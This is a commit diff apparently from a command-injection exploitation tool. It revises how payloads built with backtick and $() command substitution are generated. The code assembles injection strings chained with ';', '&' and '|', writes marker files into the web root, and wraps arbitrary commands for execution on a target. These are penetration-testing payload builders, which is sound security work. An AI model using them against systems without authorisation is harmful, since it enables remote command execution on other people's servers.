mprovement regarding tamper script "backticks.py" for supporting time…

…-related techniques (i.e. "time-based", "tempfile-based").

doc/CHANGELOG.md

@@ -1,3 +1,6 @@
+## Version 4.1 (TBA)
+* Revised: Improvement regarding tamper script "backticks.py" for supporting time-related techniques (i.e. "time-based", "tempfile-based").
+
 ## Version 4.0 (2024-12-20)
 * Fixed: Multiple bug-fixes regarding several reported unhandled exceptions.
 * Revised: Minor bug-fix regarding tamper script "backticks.py"

src/core/injections/controller/checks.py

@@ -1502,20 +1502,24 @@ def tamper_scripts(stored_tamper_scripts):
       if "hexencode" or "base64encode" == script:
         settings.MULTI_ENCODED_PAYLOAD.append(script)
       import_script = str(settings.TAMPER_SCRIPTS_PATH + script + ".py").replace("/",".").split(".py")[0]
+      if not stored_tamper_scripts:
+        settings.print_data_to_stdout(settings.SUB_CONTENT_SIGN + import_script.split(".")[-1])
       warn_msg = ""
       if settings.EVAL_BASED_STATE != False and script in settings.EVAL_NOT_SUPPORTED_TAMPER_SCRIPTS:
         warn_msg = "The dynamic code evaluation technique does "
       elif settings.TARGET_OS == settings.OS.WINDOWS and script in settings.WIN_NOT_SUPPORTED_TAMPER_SCRIPTS:
         warn_msg = "Windows targets do "
       elif settings.TARGET_OS != settings.OS.WINDOWS and script in settings.UNIX_NOT_SUPPORTED_TAMPER_SCRIPTS:
         warn_msg = "Unix-like targets do "
+      elif "backticks" == script and menu.options.alter_shell:
+          warn_msg = "Option '--alter-shell' "
       if len(warn_msg) != 0:
         if not stored_tamper_scripts:
           warn_msg = warn_msg + "not support the usage of '" + script + ".py'. Skipping tamper script."
           settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
       else:
-        if not stored_tamper_scripts:
-          settings.print_data_to_stdout(settings.SUB_CONTENT_SIGN + import_script.split(".")[-1])
+        # if not stored_tamper_scripts:
+        #   settings.print_data_to_stdout(settings.SUB_CONTENT_SIGN + import_script.split(".")[-1])
         try:
           module = __import__(import_script, fromlist=[None])
           if not hasattr(module, "__tamper__"):

src/core/injections/controller/controller.py

@@ -40,6 +40,26 @@
 Checks if the testable parameter is exploitable.
 """
 
+"""
+Heuristic basic checks payloads generator
+"""
+def basic_payload_generator():
+  suffix = ""
+  if settings.USE_BACKTICKS:
+    prefix = "expr "
+  else:
+    prefix = "("
+    suffix = ")"
+  settings.BASIC_STRING = prefix + settings.CALC_STRING + suffix
+  settings.BASIC_COMMAND_INJECTION_PAYLOADS = [";echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + 
+                                              "%26echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + 
+                                              "|echo " + settings.CMD_SUB_PREFIX + settings.BASIC_STRING + settings.CMD_SUB_SUFFIX + 
+                                              settings.RANDOM_STRING_GENERATOR,
+                                              "|set /a " + settings.BASIC_STRING + "%26set /a " + settings.BASIC_STRING
+                                              ]
+"""
+Initializing basic level check status
+"""
 def basic_level_checks():
   settings.TIME_RELATIVE_ATTACK = False
   settings.SKIP_CODE_INJECTIONS = None
@@ -134,13 +154,15 @@ def heuristic_request(url, http_request_method, check_parameter, payload, whites
 """
 def command_injection_heuristic_basic(url, http_request_method, check_parameter, the_type, header_name, inject_http_headers):
   check_parameter = check_parameter.lstrip().rstrip()
+  checks.perform_payload_modification(payload="")
+  basic_payload_generator()
   if menu.options.alter_shell:
     basic_payloads = settings.ALTER_SHELL_BASIC_COMMAND_INJECTION_PAYLOADS
   else:
     basic_payloads = settings.BASIC_COMMAND_INJECTION_PAYLOADS
   settings.CLASSIC_STATE = True
   try:
-    checks.perform_payload_modification(payload="")
+    # checks.perform_payload_modification(payload="")
     for whitespace in settings.WHITESPACES:
       if not settings.IDENTIFIED_COMMAND_INJECTION:
         _ = 0
@@ -735,12 +757,6 @@ def do_check(url, http_request_method, filename):
         warn_msg += "time-based injections because of inherent high latency time."
         settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
 
-    # Check for "backticks" tamper script.
-    if settings.USE_BACKTICKS == True:
-      if not menu.options.tech or "e" in menu.options.tech or "t" in menu.options.tech or "f" in menu.options.tech:
-        warn_msg = "Commands substitution using backtics is only supported by the (results-based) classic command injection technique. "
-        settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
-
     perform_checks(url, http_request_method, filename)
 
     # All injection techniques seems to be failed!

src/core/injections/controller/handler.py

@@ -311,15 +311,15 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t
 
                       if settings.TARGET_OS == settings.OS.WINDOWS:
                         if alter_shell:
-                          if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: 
-                            cmd = settings.WIN_PYTHON_INTERPRETER + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\""
-                          else:
-                            cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\""
+                          # if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: 
+                          #   cmd = settings.WIN_PYTHON_INTERPRETER + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\""
+                          # else:
+                          cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\""
                         else:
                           rand_num = randv1 + randv2
                           cmd = "powershell.exe -InputFormat none write (" + str(rand_num) + ")"
                       else:
-                        if technique == settings.INJECTION_TECHNIQUE.TIME_BASED:
+                        if technique == settings.INJECTION_TECHNIQUE.TIME_BASED or technique == settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED:
                           cmd = "expr " + str(randv1) + " %2B " + str(randv2) + ""
                         else:
                           cmd = "echo $((" + str(randv1) + " %2B " + str(randv2) + "))"

src/core/injections/results_based/techniques/classic/cb_payloads.py

@@ -36,44 +36,22 @@ def decision(separator, TAG, randv1, randv2):
               "\"') do @set /p = " + TAG + "%i" + TAG + TAG + settings.CMD_NUL
               )
   else:
-    if not settings.WAF_ENABLED:
-      if settings.USE_BACKTICKS:
-        math_calc = "`expr " + str(randv1) + " %2B " + str(randv2) + "`"
-      else:
-        math_calc = "$((" + str(randv1) + "%2B" + str(randv2) + "))"
+    if settings.USE_BACKTICKS or settings.WAF_ENABLED:
+      math_calc = settings.CMD_SUB_PREFIX + "expr " + str(randv1) + " %2B " + str(randv2) + settings.CMD_SUB_SUFFIX
     else:
-      if settings.USE_BACKTICKS:
-        math_calc = "`expr " + str(randv1) + " %2B " + str(randv2) + "`"
-      else:
-        math_calc = "$(expr " + str(randv1) + " %2B " + str(randv2) + ")"
+      math_calc = settings.CMD_SUB_PREFIX + "(" + str(randv1) + "%2B" + str(randv2) + "))"
 
     if settings.SKIP_CALC:
-      if settings.USE_BACKTICKS:
-        payload = (separator +
-                  "echo " + TAG +
-                  TAG + "" + TAG + "" + 
-                  separator
-                   )
-      else:
-        payload = (separator +
-                  "echo " + TAG +
-                  "$(echo " + TAG + ")" + TAG + "" + 
-                  separator
-                   )
+      payload = (separator +
+                "echo " + TAG +
+                settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX  + TAG 
+                )
     else:
-      if settings.USE_BACKTICKS:
-        payload = (separator +
-                  "echo " + TAG +
-                  math_calc +
-                  TAG + "" + TAG + ""
-                   )
-      else:
-        payload = (separator +
-                  "echo " + TAG +
-                  math_calc +
-                  "$(echo " + TAG + ")" + TAG + "" + 
-                  separator
-                   )
+      payload = (separator +
+                "echo " + TAG +
+                math_calc +
+                settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX  + TAG 
+                )
   return payload
 
 """
@@ -96,16 +74,14 @@ def decision_alter_shell(separator, TAG, randv1, randv2):
       payload = (separator +
                 settings.LINUX_PYTHON_INTERPRETER + " -c \"print('" + TAG +
                 TAG +
-                TAG + "')\"" + 
-                separator
+                TAG + "')\""
                 )
     else:
       payload = (separator +
                 settings.LINUX_PYTHON_INTERPRETER + " -c \"print('" + TAG +
                 "'%2Bstr(int(" + str(int(randv1)) + "%2B" + str(int(randv2)) + "))" + "%2B'" +
                 TAG + "'%2B'" +
-                TAG + "')\"" + 
-                separator
+                TAG + "')\""
                 )
   return payload
 
@@ -126,25 +102,13 @@ def cmd_execution(separator, TAG, cmd):
                 )
   else:
     settings.USER_APPLIED_CMD = cmd
-    if settings.USE_BACKTICKS:
-      cmd_exec = "`" + cmd + "`"
-      payload = (separator +
-                "echo " + TAG +
-                "" + TAG + "" +
-                cmd_exec +
-                "" + TAG + "" + TAG + "" + 
-                separator
-                )
-    else:
-      cmd_exec = "$(" + cmd + ")"
-      payload = (separator +
-                "echo " + TAG +
-                "$(echo " + TAG + ")" +
-                cmd_exec +
-                "$(echo " + TAG + ")" + TAG + "" + 
-                separator
-                )
-
+    cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX 
+    payload = (separator +
+              "echo " + TAG +
+              settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX  +
+              cmd_exec +
+              settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX  + TAG
+              )
   return payload
 
 """
@@ -164,23 +128,14 @@ def cmd_execution_alter_shell(separator, TAG, cmd):
                 TAG + TAG + " $(" + cmd + ") "+ TAG + TAG + "')\"" +
                 "') do @set /p=%i " + settings.CMD_NUL
                 )
-
   else:
-
-    if settings.USE_BACKTICKS:
-      payload = (separator +
-                settings.LINUX_PYTHON_INTERPRETER + 
-                " -c \"print('" + TAG + "'%2B'" + TAG + "'%2B'$(echo `" + cmd + ")`" + 
-                TAG + "'%2B'" + TAG + "')\"" + 
-                separator
-                )
-    else:
-      payload = (separator +
-                settings.LINUX_PYTHON_INTERPRETER + 
-                " -c \"print('" + TAG + "'%2B'" + TAG + "'%2B'$(echo $(" + cmd + "))'%2B'" + 
-                TAG + "'%2B'" + TAG + "')\"" + 
-                separator
-                )
+    settings.USER_APPLIED_CMD = cmd
+    cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX
+    payload = (separator +
+              settings.LINUX_PYTHON_INTERPRETER + 
+              " -c \"print('" + TAG + "'%2B'" + TAG + "'%2B'" + settings.CMD_SUB_PREFIX + "echo " + cmd_exec + settings.CMD_SUB_SUFFIX + "'%2B'" + 
+              TAG + "'%2B'" + TAG + "')\""
+              )
   return payload
 
 # eof

src/core/injections/semiblind/techniques/file_based/fb_payloads.py

@@ -35,8 +35,7 @@ def decision(separator, TAG, OUTPUT_TEXTFILE):
               )
   else:
     payload = (separator +
-              "echo " + TAG + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE +
-              separator
+              "echo " + TAG + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE
               )
 
   return payload
@@ -45,7 +44,6 @@ def decision(separator, TAG, OUTPUT_TEXTFILE):
 __Warning__: The alternative shells are still experimental.
 """
 def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE):
-
   if settings.TARGET_OS == settings.OS.WINDOWS:
     python_payload = settings.WIN_PYTHON_INTERPRETER + " -c \"open('" + OUTPUT_TEXTFILE + "','w').write('" + TAG + "')\""
     payload = (separator +
@@ -55,7 +53,7 @@ def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE):
               )
   else:
     payload = (separator +
-              "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\")"
+              settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + TAG + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX
                )
 
   if settings.USER_AGENT_INJECTION == True or \
@@ -87,8 +85,7 @@ def cmd_execution(separator, cmd, OUTPUT_TEXTFILE):
   else:
     settings.USER_APPLIED_CMD = cmd
     payload = (separator +
-              cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE +
-              separator
+              cmd + settings.FILE_WRITE_OPERATOR + settings.WEB_ROOT + OUTPUT_TEXTFILE
               )
 
   return payload
@@ -110,7 +107,8 @@ def cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE):
                 )
   else:
     payload = (separator +
-              "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('$(echo $(" + cmd + "))')\nf.close()\n\")"
+              settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"f=open('" + settings.WEB_ROOT + OUTPUT_TEXTFILE + "','w')\nf.write('" + 
+              settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + "')\nf.close()\n\"" + settings.CMD_SUB_SUFFIX
               )
 
   # New line fixation